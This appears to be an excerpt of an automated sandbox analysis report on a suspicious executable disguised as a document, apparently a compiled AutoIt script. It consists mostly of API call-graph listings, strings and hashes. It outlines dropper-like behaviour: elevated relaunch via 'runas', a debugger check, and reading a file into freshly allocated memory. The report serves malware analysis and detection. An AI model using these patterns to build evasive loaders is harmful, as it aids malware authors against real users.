41b9c4 __close_nolock 67 API calls 86101->86105 86102->86095 86106 41e573 GetLastError 86102->86106 86104->86089 86105->86107 86106->86095 86107->86095 86107->86100 86108->86074 86109->86088 86110->86078 86111->86082 86113->86089 86114->86088 86116 41b9d1 86115->86116 86117 41b9e9 86115->86117 86118 417f36 __locking 67 API calls 86116->86118 86119 417f36 __locking 67 API calls 86117->86119 86127 41ba2e 86117->86127 86120 41b9d6 86118->86120 86121 41ba17 86119->86121 86122 417f23 __fptostr 67 API calls 86120->86122 86123 417f23 __fptostr 67 API calls 86121->86123 86124 41b9de 86122->86124 86125 41ba1e 86123->86125 86124->86097 86126 417ebb __fptostr 6 API calls 86125->86126 86126->86127 86127->86097 86128->86098 86129->86104 86131 415126 __locking 86130->86131 86132 41516f 86131->86132 86133 415164 __locking 86131->86133 86139 41513a _memset 86131->86139 86134 415965 __lock_file 68 API calls 86132->86134 86133->85803 86136 415177 86134->86136 86143 414f10 86136->86143 86137 415154 86160 417ebb 6 API calls 2 library calls 86137->86160 86159 417f23 67 API calls __getptd_noexit 86139->86159 86147 414f2e _memset 86143->86147 86149 414f4c 86143->86149 86144 414f37 86212 417f23 67 API calls __getptd_noexit 86144->86212 86146 414f3c 86213 417ebb 6 API calls 2 library calls 86146->86213 86147->86144 86147->86149 86151 414f8b 86147->86151 86161 4151a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 86149->86161 86151->86149 86152 4150d5 _memset 86151->86152 86153 4150a9 _memset 86151->86153 86154 41453a __fileno 67 API calls 86151->86154 86162 41ed9e 86151->86162 86192 41e6b1 86151->86192 86214 41ee9b 67 API calls 3 library calls 86151->86214 86216 417f23 67 API calls __getptd_noexit 86152->86216 86215 417f23 67 API calls __getptd_noexit 86153->86215 86154->86151 86159->86137 86161->86133 86163 41edaa __locking 86162->86163 86164 41edb2 86163->86164 86165 41edcd 86163->86165 86286 417f36 67 API calls __getptd_noexit 86164->86286 86167 41eddb 86165->86167 86170 41ee1c 86165->86170 86288 417f36 67 API calls __getptd_noexit 86167->86288 86168 41edb7 86287 417f23 67 API calls __getptd_noexit 86168->86287 86173 41ee29 86170->86173 86174 41ee3d 86170->86174 86172 41ede0 86289 417f23 67 API calls __getptd_noexit 86172->86289 86291 417f36 67 API calls __getptd_noexit 86173->86291 86177 41ba3b ___lock_fhandle 68 API calls 86174->86177 86180 41ee43 86177->86180 86178 41ede7 86290 417ebb 6 API calls 2 library calls 86178->86290 86179 41ee2e 86292 417f23 67 API calls __getptd_noexit 86179->86292 86183 41ee50 86180->86183 86184 41ee66 86180->86184 86182 41edbf __locking 86182->86151 86217 41e7dc 86183->86217 86293 417f23 67 API calls __getptd_noexit 86184->86293 86188 41ee6b 86294 417f36 67 API calls __getptd_noexit 86188->86294 86189 41ee5e 86295 41ee91 LeaveCriticalSection __unlock_fhandle 86189->86295 86193 41e6c1 86192->86193 86197 41e6de 86192->86197 86299 417f23 67 API calls __getptd_noexit 86193->86299 86195 41e6d6 86195->86151 86196 41e6c6 86300 417ebb 6 API calls 2 library calls 86196->86300 86197->86195 86199 41e713 86197->86199 86296 423600 86197->86296 86201 41453a __fileno 67 API calls 86199->86201 86202 41e727 86201->86202 86203 41ed9e __read 79 API calls 86202->86203 86204 41e72e 86203->86204 86204->86195 86205 41453a __fileno 67 API calls 86204->86205 86206 41e751 86205->86206 86206->86195 86207 41453a __fileno 67 API calls 86206->86207 86208 41e75d 86207->86208 86208->86195 86209 41453a __fileno 67 API calls 86208->86209 86210 41e769 86209->86210 86211 41453a __fileno 67 API calls 86210->86211 86211->86195 86212->86146 86214->86151 86215->86146 86216->86146 86218 41e813 86217->86218 86219 41e7f8 86217->86219 86221 41e822 86218->86221 86224 41e849 86218->86224 86220 417f36 __locking 67 API calls 86219->86220 86223 41e7fd 86220->86223 86222 417f36 __locking 67 API calls 86221->86222 86225 41e827 86222->86225 86227 417f23 __fptostr 67 API calls 86223->86227 86226 41e868 86224->86226 86231 41e87c 86224->86231 86228 417f23 __fptostr 67 API calls 86225->86228 86229 417f36 __locking 67 API calls 86226->86229 86238 41e805 86227->86238 86232 41e82e 86228->86232 86234 41e86d 86229->86234 86230 41e8d4 86233 417f36 __locking 67 API calls 86230->86233 86231->86230 86231->86238 86240 41e8b0 86231->86240 86242 41e8f5 86231->86242 86235 417ebb __fptostr 6 API calls 86232->86235 86236 41e8d9 86233->86236 86237 417f23 __fptostr 67 API calls 86234->86237 86235->86238 86239 417f23 __fptostr 67 API calls 86236->86239 86241 41e874 86237->86241 86238->86189 86239->86241 86240->86230 86249 41e8bb ReadFile 86240->86249 86243 417ebb __fptostr 6 API calls 86241->86243 86244 416fb6 __malloc_crt 67 API calls 86242->86244 86243->86238 86246 41e90b 86244->86246 86252 41e931 86246->86252 86253 41e913 86246->86253 86247 41ed62 GetLastError 86250 41ebe8 86247->86250 86251 41ed6f 86247->86251 86248 41e9e7 86248->86247 86256 41e9fb 86248->86256 86249->86247 86249->86248 86260 417f49 __dosmaperr 67 API calls 86250->86260 86265 41eb6d 86250->86265 86254 417f23 __fptostr 67 API calls 86251->86254 86257 423462 __lseeki64_nolock 69 API calls 86252->86257 86255 417f23 __fptostr 67 API calls 86253->86255 86258 41ed74 86254->86258 86259 41e918 86255->86259 86256->86265 86266 41ea17 86256->86266 86269 41ec2d 86256->86269 86261 41e93d 86257->86261 86262 417f36 __locking 67 API calls 86258->86262 86263 417f36 __locking 67 API calls 86259->86263 86260->86265 86261->86249 86262->86265 86263->86238 86264 413a88 __output_l 67 API calls 86264->86238 86265->86238 86265->86264 86267 41ea7d ReadFile 86266->86267 86274 41eafa 86266->86274 86270 41ea9b GetLastError 86267->86270 86279 41eaa5 86267->86279 86268 41eca5 ReadFile 86271 41ecc4 GetLastError 86268->86271 86277 41ecce 86268->86277 86269->86265 86269->86268 86270->86266 86270->86279 86271->86269 86271->86277 86272 41ebbe MultiByteToWideChar 86272->86265 86273 41ebe2 GetLastError 86272->86273 86273->86250 86274->86265 86275 41eb75 86274->86275 86276 41eb68 86274->86276 86282 41eb32 86274->86282 86275->86282 86283 41ebac 86275->86283 86278 417f23 __fptostr 67 API calls 86276->86278 86277->86269 86281 423462 __lseeki64_nolock 69 API calls 86277->86281 86278->86265 86279->86266 86280 423462 __lseeki64_nolock 69 API calls 86279->86280 86280->86279 86281->86277 86282->86272 86284 423462 __lseeki64_nolock 69 API calls 86283->86284 86285 41ebbb 86284->86285 86285->86272 86286->86168 86287->86182 86288->86172 86289->86178 86291->86179 86292->86178 86293->86188 86294->86189 86295->86182 86297 416fb6 __malloc_crt 67 API calls 86296->86297 86298 423615 86297->86298 86298->86199 86299->86196 86304 414cef GetSystemTimeAsFileTime __aulldiv 86301->86304 86303 4431ef 86303->85806 86304->86303 86305->85814 86307->85819 86313 4523e1 _wcscpy 86308->86313 86309 4151b0 81 API calls __fread_nolock 86309->86313 86310 44afdc GetSystemTimeAsFileTime 86310->86313 86311 452553 86311->85736 86311->85737 86312 41557c 105 API calls _fseek 86312->86313 86313->86309 86313->86310 86313->86311 86313->86312 86315 44b1b4 86314->86315 86316 44b1a6 86314->86316 86318 44b1ca 86315->86318 86319 414e06 138 API calls 86315->86319 86320 44b1c2 86315->86320 86317 414e06 138 API calls 86316->86317 86317->86315 86349 4352d1 81 API calls 2 library calls 86318->86349 86321 44b2c1 86319->86321 86320->85763 86321->86318 86323 44b2cf 86321->86323 86325 44b2dc 86323->86325 86328 414e94 __fcloseall 106 API calls 86323->86328 86324 44b20d 86326 44b211 86324->86326 86327 44b23b 86324->86327 86325->85763 86330 44b21e 86326->86330 86333 414e94 __fcloseall 106 API calls 86326->86333 86350 43526e 86327->86350 86328->86325 86331 44b22e 86330->86331 86334 414e94 __fcloseall 106 API calls 86330->86334 86331->85763 86332 44b242 86335 44b270 86332->86335 86336 44b248 86332->86336 86333->86330 86334->86331 86360 44b0af 111 API calls 86335->86360 86338 44b255 86336->86338 86340 414e94 __fcloseall 106 API calls 86336->86340 86341 44b265 86338->86341 86343 414e94 __fcloseall 106 API calls 86338->86343 86339 44b276 86361 43522c 67 API calls __output_l 86339->86361 86340->86338 86341->85763 86343->86341 86344 44b27c 86345 414e94 __fcloseall 106 API calls 86344->86345 86346 44b289 86344->86346 86345->86346 86347 44b299 86346->86347 86348 414e94 __fcloseall 106 API calls 86346->86348 86347->85763 86348->86347 86349->86324 86351 4138ba _malloc 67 API calls 86350->86351 86352 43527d 86351->86352 86353 4138ba _malloc 67 API calls 86352->86353 86354 43528d 86353->86354 86355 4138ba _malloc 67 API calls 86354->86355 86356 43529d 86355->86356 86359 4352bc 86356->86359 86362 43522c 67 API calls __output_l 86356->86362 86358 4352c8 86358->86332 86359->86332 86360->86339 86361->86344 86362->86358 86363->85652 86364->85655 86365->85673 86366->85673 86367->85673 86368->85670 86369->85673 86370->85673 86371->85677 86372->85687 86374->85686 86375->85578 86377 410148 SHGetDesktopFolder 86376->86377 86380 4101a3 _wcscpy 86376->86380 86378 41015a _wcscpy 86377->86378 86377->86380 86379 41018a SHGetPathFromIDListW 86378->86379 86378->86380 86379->86380 86380->85581 86381->85583 86383 40f5e0 152 API calls 86382->86383 86384 40f417 86383->86384 86385 42ca37 86384->86385 86386 40f42c 86384->86386 86387 42ca1f 86384->86387 86388 452574 140 API calls 86385->86388 86420 4037e0 139 API calls 7 library calls 86386->86420 86421 43717f 110 API calls _printf 86387->86421 86391 42ca50 86388->86391 86394 42ca76 86391->86394 86395 42ca54 86391->86395 86392 40f446 86392->85579 86393 42ca2d 86393->86385 86396 41171a 75 API calls 86394->86396 86397 434fe1 106 API calls 86395->86397 86412 42cacc ctype 86396->86412 86398 42ca5e 86397->86398 86422 43717f 110 API calls _printf 86398->86422 86400 42ca6c 86400->86394 86401 42ccc3 86402 413a88 __output_l 67 API calls 86401->86402 86403 42cccd 86402->86403 86404 434fe1 106 API calls 86403->86404 86405 42ccda 86404->86405 86409 401b70 75 API calls 86409->86412 86412->86401 86412->86409 86413 402cc0 75 API calls 2 library calls 86412->86413 86414 4026a0 86412->86414 86423 445051 75 API calls _memcpy_s 86412->86423 86424 44c80c 87 API calls 3 library calls 86412->86424 86425 44b408 75 API calls 86412->86425 86413->86412 86415 4026af 86414->86415 86418 40276b 86414->86418 86416 41171a 75 API calls 86415->86416 86417 4026ee ctype 86415->86417 86415->86418 86416->86417 86417->86418 86419 41171a 75 API calls 86417->86419 86418->86412 86419->86417 86420->86392 86421->86393 86422->86400 86423->86412 86424->86412 86425->86412 86426->85590 86427->85591 86429 401bfb 86428->86429 86449 401cde 86428->86449 86430 4013a0 75 API calls 86429->86430 86431 401c0b 86430->86431 86432 42a9a0 LoadStringW 86431->86432 86433 401c18 86431->86433 86435 42a9bb 86432->86435 86434 4021e0 75 API calls 86433->86434 86436 401c2d 86434->86436 86452 40df50 75 API calls 86435->86452 86438 401c3a 86436->86438 86439 42a9cd 86436->86439 86438->86435 86440 401c44 86438->86440 86453 40d3b0 75 API calls 2 library calls 86439->86453 86451 40d3b0 75 API calls 2 library calls 86440->86451 86443 42a9dc 86444 42a9f0 86443->86444 86446 401c53 _memset _wcscpy _wcsncpy 86443->86446 86454 40d3b0 75 API calls 2 library calls 86444->86454 86448 401cc2 Shell_NotifyIconW 86446->86448 86447 42a9fe 86448->86449 86449->85602 86450->85596 86451->86446 86452->86446 86453->86443 86454->86447 84716 444343 84719 444326 84716->84719 84718 44434e WriteFile 84720 444340 84719->84720 84721 4442c7 84719->84721 84720->84718 84726 40e190 SetFilePointerEx 84721->84726 84723 4442e0 SetFilePointerEx 84727 40e190 SetFilePointerEx 84723->84727 84725 4442ff 84725->84718 84726->84723 84727->84725 84728 46d22f 84731 46d098 84728->84731 84730 46d241 84732 46d0b5 84731->84732 84733 46d115 84732->84733 84734 46d0b9 84732->84734 84798 45c216 78 API calls 84733->84798 84775 41171a 84734->84775 84737 46d126 84739 46d0f8 84737->84739 84746 46d142 84737->84746 84794 4092c0 84739->84794 84740 46d0cc 84788 453063 84740->84788 84744 46d0fd 84744->84730 84747 46d1c8 84746->84747 84749 46d158 84746->84749 84808 4676a3 78 API calls 84747->84808 84753 453063 111 API calls 84749->84753 84750 46d0ea 84750->84746 84754 46d0ee 84750->84754 84752 46d1ce 84809 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84752->84809 84762 46d15e 84753->84762 84754->84739 84793 44ade5 CloseHandle ctype 84754->84793 84755 46d18d 84799 467fce 82 API calls 84755->84799 84759 46d196 84800 4013a0 84759->84800 84760 46d1e7 84764 4092c0 VariantClear 84760->84764 84773 46d194 84760->84773 84762->84755 84762->84759 84764->84773 84766 46d1ac 84806 40d3b0 75 API calls 2 library calls 84766->84806 84768 46d224 84768->84730 84769 46d1b8 84807 467fce 82 API calls 84769->84807 84770 40d900 CloseHandle 84772 46d216 84770->84772 84810 44ade5 CloseHandle ctype 84772->84810 84773->84768 84773->84770 84777 411724 84775->84777 84778 41173e 84777->84778 84782 411740 std::bad_alloc::bad_alloc 84777->84782 84811 4138ba 84777->84811 84829 411afc 6 API calls __decode_pointer 84777->84829 84778->84740 84787 40d940 76 API calls 84778->84787 84780 411766 84833 4116fd 67 API calls std::exception::exception 84780->84833 84782->84780 84830 411421 84782->84830 84783 411770 84834 41805b RaiseException 84783->84834 84786 41177e 84787->84740 84789 45306e 84788->84789 84790 45307a 84788->84790 84789->84790 84972 452e2a 111 API calls 5 library calls 84789->84972 84792 40dfa0 83 API calls 84790->84792 84792->84750 84793->84739 84795 4092c8 ctype 84794->84795 84796 429db0 VariantClear 84795->84796 84797 4092d5 ctype 84795->84797 84796->84797 84797->84744 84798->84737 84799->84773 84801 41171a 75 API calls 84800->84801 84802 4013c4 84801->84802 84973 401380 84802->84973 84805 40df50 75 API calls 84805->84766 84806->84769 84807->84773 84808->84752 84809->84760 84810->84768 84812 41396d 84811->84812 84813 4138cc 84811->84813 84842 411afc 6 API calls __decode_pointer 84812->84842 84815 4138dd 84813->84815 84821 413965 84813->84821 84822 413929 RtlAllocateHeap 84813->84822 84824 413959 84813->84824 84827 41395e 84813->84827 84838 41386b 67 API calls 4 library calls 84813->84838 84839 411afc 6 API calls __decode_pointer 84813->84839 84815->84813 84835 418252 67 API calls 2 library calls 84815->84835 84836 4180a7 67 API calls 7 library calls 84815->84836 84837 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84815->84837 84816 413973 84843 417f23 67 API calls __getptd_noexit 84816->84843 84821->84777 84822->84813 84840 417f23 67 API calls __getptd_noexit 84824->84840 84841 417f23 67 API calls __getptd_noexit 84827->84841 84829->84777 84844 4113e5 84830->84844 84832 41142e 84832->84780 84833->84783 84834->84786 84835->84815 84836->84815 84838->84813 84839->84813 84840->84827 84841->84821 84842->84816 84843->84821 84845 4113f1 __locking 84844->84845 84852 41181b 84845->84852 84851 411412 __locking 84851->84832 84878 418407 84852->84878 84854 4113f6 84855 4112fa 84854->84855 84943 4169e9 TlsGetValue 84855->84943 84858 4169e9 __decode_pointer 6 API calls 84859 41131e 84858->84859 84860 4113a1 84859->84860 84953 4170e7 68 API calls 5 library calls 84859->84953 84875 41141b 84860->84875 84862 41133c 84865 411357 84862->84865 84866 411366 84862->84866 84874 411388 84862->84874 84863 41696e __encode_pointer 6 API calls 84864 411396 84863->84864 84867 41696e __encode_pointer 6 API calls 84864->84867 84954 417047 73 API calls _realloc 84865->84954 84866->84860 84869 411360 84866->84869 84867->84860 84869->84866 84872 41137c 84869->84872 84955 417047 73 API calls _realloc 84869->84955 84871 411376 84871->84860 84871->84872 84956 41696e TlsGetValue 84872->84956 84874->84863 84968 411824 84875->84968 84879 41841c 84878->84879 84880 41842f EnterCriticalSection 84878->84880 84885 418344 84879->84885 84880->84854 84882 418422 84882->84880 84913 4117af 67 API calls 3 library calls 84882->84913 84884 41842e 84884->84880 84886 418350 __locking 84885->84886 84887 418360 84886->84887 84888 418378 84886->84888 84914 418252 67 API calls 2 library calls 84887->84914 84894 418386 __locking 84888->84894 84917 416fb6 84888->84917 84890 418365 84915 4180a7 67 API calls 7 library calls 84890->84915 84894->84882 84895 41836c 84916 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84895->84916 84896 4183a7 84898 418407 __lock 67 API calls 84896->84898 84897 418398 84923 417f23 67 API calls __getptd_noexit 84897->84923 84901 4183ae 84898->84901 84903 4183e2 84901->84903 84904 4183b6 84901->84904 84906 413a88 __output_l 67 API calls 84903->84906 84924 4189e6 InitializeCriticalSectionAndSpinCount __locking 84904->84924 84908 4183d3 84906->84908 84907 4183c1 84907->84908 84925 413a88 84907->84925 84939 4183fe LeaveCriticalSection _doexit 84908->84939 84911 4183cd 84938 417f23 67 API calls __getptd_noexit 84911->84938 84913->84884 84914->84890 84915->84895 84920 416fbf 84917->84920 84918 4138ba _malloc 66 API calls 84918->84920 84919 416ff5 84919->84896 84919->84897 84920->84918 84920->84919 84921 416fd6 Sleep 84920->84921 84922 416feb 84921->84922 84922->84919 84922->84920 84923->84894 84924->84907 84926 413a94 __locking 84925->84926 84927 413ad3 84926->84927 84928 413b0d __locking __dosmaperr 84926->84928 84930 418407 __lock 65 API calls 84926->84930 84927->84928 84929 413ae8 RtlFreeHeap 84927->84929 84928->84911 84929->84928 84931 413afa 84929->84931 84932 413aab ___sbh_find_block 84930->84932 84942 417f23 67 API calls __getptd_noexit 84931->84942 84937 413ac5 84932->84937 84940 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __fptostr 84932->84940 84934 413aff GetLastError 84934->84928 84941 413ade LeaveCriticalSection _doexit 84937->84941 84938->84908 84939->84894 84940->84937 84941->84927 84942->84934 84944 416a01 84943->84944 84945 416a22 GetModuleHandleW 84943->84945 84944->84945 84948 416a0b TlsGetValue 84944->84948 84946 416a32 84945->84946 84947 416a3d GetProcAddress 84945->84947 84966 41177f Sleep GetModuleHandleW 84946->84966 84950 41130e 84947->84950 84952 416a16 84948->84952 84950->84858 84951 416a38 84951->84947 84951->84950 84952->84945 84952->84950 84953->84862 84954->84869 84955->84871 84957 4169a7 GetModuleHandleW 84956->84957 84958 416986 84956->84958 84959 4169c2 GetProcAddress 84957->84959 84960 4169b7 84957->84960 84958->84957 84961 416990 TlsGetValue 84958->84961 84963 41699f 84959->84963 84967 41177f Sleep GetModuleHandleW 84960->84967 84965 41699b 84961->84965 84963->84874 84964 4169bd 84964->84959 84964->84963 84965->84957 84965->84963 84966->84951 84967->84964 84971 41832d LeaveCriticalSection 84968->84971 84970 411420 84970->84851 84971->84970 84972->84790 84974 41171a 75 API calls 84973->84974 84975 401387 84974->84975 84975->84805 86455 42919b 86460 40ef10 86455->86460 86458 411421 __cinit 74 API calls 86459 4291aa 86458->86459 86461 41171a 75 API calls 86460->86461 86462 40ef17 86461->86462 86463 42ad48 86462->86463 86468 40ef40 74 API calls __cinit 86462->86468 86465 40ef2a 86469 40e470 86465->86469 86468->86465 86470 40c060 75 API calls 86469->86470 86471 40e483 GetVersionExW 86470->86471 86472 4021e0 75 API calls 86471->86472 86473 40e4bb 86472->86473 86495 40e600 86473->86495 86479 42accc 86481 42ad28 GetSystemInfo 86479->86481 86485 42ad38 GetSystemInfo 86481->86485 86482 40e557 GetCurrentProcess 86515 40ee30 LoadLibraryA GetProcAddress 86482->86515 86483 40e56c 86483->86485 86508 40eee0 86483->86508 86488 40e5c9 86512 40eea0 86488->86512 86491 40e5e0 86493 40e5f1 FreeLibrary 86491->86493 86494 40e5f4 86491->86494 86492 40e5dd FreeLibrary 86492->86491 86493->86494 86494->86458 86496 40e60b 86495->86496 86497 40c740 75 API calls 86496->86497 86498 40e4c2 86497->86498 86499 40e620 86498->86499 86500 40e62a 86499->86500 86501 42ac93 86500->86501 86502 40c740 75 API calls 86500->86502 86503 40e4ce 86502->86503 86503->86479 86504 40ee70 86503->86504 86505 40e551 86504->86505 86506 40ee76 LoadLibraryA 86504->86506 86505->86482 86505->86483 86506->86505 86507 40ee87 GetProcAddress 86506->86507 86507->86505 86509 40e5bf 86508->86509 86510 40eee6 LoadLibraryA 86508->86510 86509->86481 86509->86488 86510->86509 86511 40eef7 GetProcAddress 86510->86511 86511->86509 86516 40eec0 LoadLibraryA GetProcAddress 86512->86516 86514 40e5d3 GetNativeSystemInfo 86514->86491 86514->86492 86515->86483 86516->86514 86517 3f94400 86518 3f92050 GetPEB 86517->86518 86519 3f944a5 86518->86519 86531 3f942f0 86519->86531 86521 3f944ce CreateFileW 86523 3f94522 86521->86523 86525 3f9451d 86521->86525 86524 3f94539 VirtualAlloc 86523->86524 86523->86525 86524->86525 86526 3f94557 ReadFile 86524->86526 86526->86525 86527 3f94572 86526->86527 86528 3f932f0 13 API calls 86527->86528 86529 3f945a5 86528->86529 86530 3f945c8 ExitProcess 86529->86530 86530->86525 86532 3f942f9 Sleep 86531->86532 86533 3f94307 86532->86533 84976 40116e 84977 401119 DefWindowProcW 84976->84977

                                                                                                                                    Executed Functions

                                                                                                                                    Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                                      • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Doc 784-01965670.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                                      • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                                      • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                                    • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Doc 784-01965670.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                                      • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 0040D7D6
                                                                                                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 00431B0E
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 00431B3F
                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                    • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                      • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                      • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                      • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                      • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                      • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                      • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                      • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                      • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                      • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                    • String ID: @GH$@GH$C:\Users\user\Desktop\Doc 784-01965670.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                    • API String ID: 2493088469-1118522121
                                                                                                                                    • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                                    • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                    • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                                    • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                                                                    Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 138 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 147 40e506-40e509 138->147 148 42accc-42acd1 138->148 149 40e540-40e555 call 40ee70 147->149 150 40e50b-40e51c 147->150 151 42acd3-42acdb 148->151 152 42acdd-42ace0 148->152 169 40e557-40e573 GetCurrentProcess call 40ee30 149->169 170 40e579-40e5a8 149->170 155 40e522-40e525 150->155 156 42ac9b-42aca7 150->156 158 42ad12-42ad20 151->158 153 42ace2-42aceb 152->153 154 42aced-42acf0 152->154 153->158 154->158 159 42acf2-42ad06 154->159 155->149 160 40e527-40e537 155->160 162 42acb2-42acba 156->162 163 42aca9-42acad 156->163 168 42ad28-42ad2d GetSystemInfo 158->168 164 42ad08-42ad0c 159->164 165 42ad0e 159->165 166 42acbf-42acc7 160->166 167 40e53d 160->167 162->149 163->149 164->158 165->158 166->149 167->149 172 42ad38-42ad3d GetSystemInfo 168->172 169->170 180 40e575 169->180 170->172 173 40e5ae-40e5c3 call 40eee0 170->173 173->168 177 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 173->177 182 40e5e0-40e5ef 177->182 183 40e5dd-40e5de FreeLibrary 177->183 180->170 184 40e5f1-40e5f2 FreeLibrary 182->184 185 40e5f4-40e5ff 182->185 183->182 184->185
                                                                                                                                    APIs
                                                                                                                                    • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                                    • String ID: pMH
                                                                                                                                    • API String ID: 2923339712-2522892712
